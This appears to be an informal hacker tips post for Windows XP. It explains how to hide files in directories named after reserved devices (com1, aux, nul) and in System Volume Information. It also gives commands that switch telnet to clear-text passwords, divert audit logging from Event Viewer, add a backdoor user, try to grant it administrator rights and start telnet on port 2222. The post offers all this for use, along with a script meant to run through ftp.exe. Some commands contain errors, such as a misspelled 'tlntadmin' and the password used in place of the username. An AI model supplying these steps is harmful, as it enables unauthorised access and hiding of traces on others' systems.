Illegal Dirs.
use md \\.\(drive):\(path)
ie md \\.\c:\recycler\com1\aux\lpt1\lpt2\nul\end
note: you must include a valid dir at the last entry to be able to enter it.
to enter the dir simply use cd c:\recycler\com1\aux\lpt1\lpt2\nul\end
and it will change. you can then store whatever into here
another nice hideing place is c:\system volume information. this is usually unaccessible by local users. so nice to hide files
dissable NTLM and enable clear text password in windows XP for telnet.
tlntadmn config sec=-ntlm+passwd
then then use
tlntadmn config auditlocation=file
to stop logging to eventviewer
scripting telnet using ftp.exe.
first make a txt file with the commands you need. ie
file.txt contains
net user testing test123 /add
net localgroup administrators test123 /add
tlntadmin config sec=-ntlm+passwd
tlntadmn config auditlocation=file
tlntadmn config port=2222
net start telnet
quit
(so adds a username to the system. then enables clear text, change telnet port to 2222 and then starts the telnet service)
to run use ftp.exe -s:file.txt -n (ip) (port)
it will then connect to the (ip) using (port) and run the commands in the file
____
hope this info is usefull to somebody out there
Note: Updated the telnet bits. shoud work correct now sorry.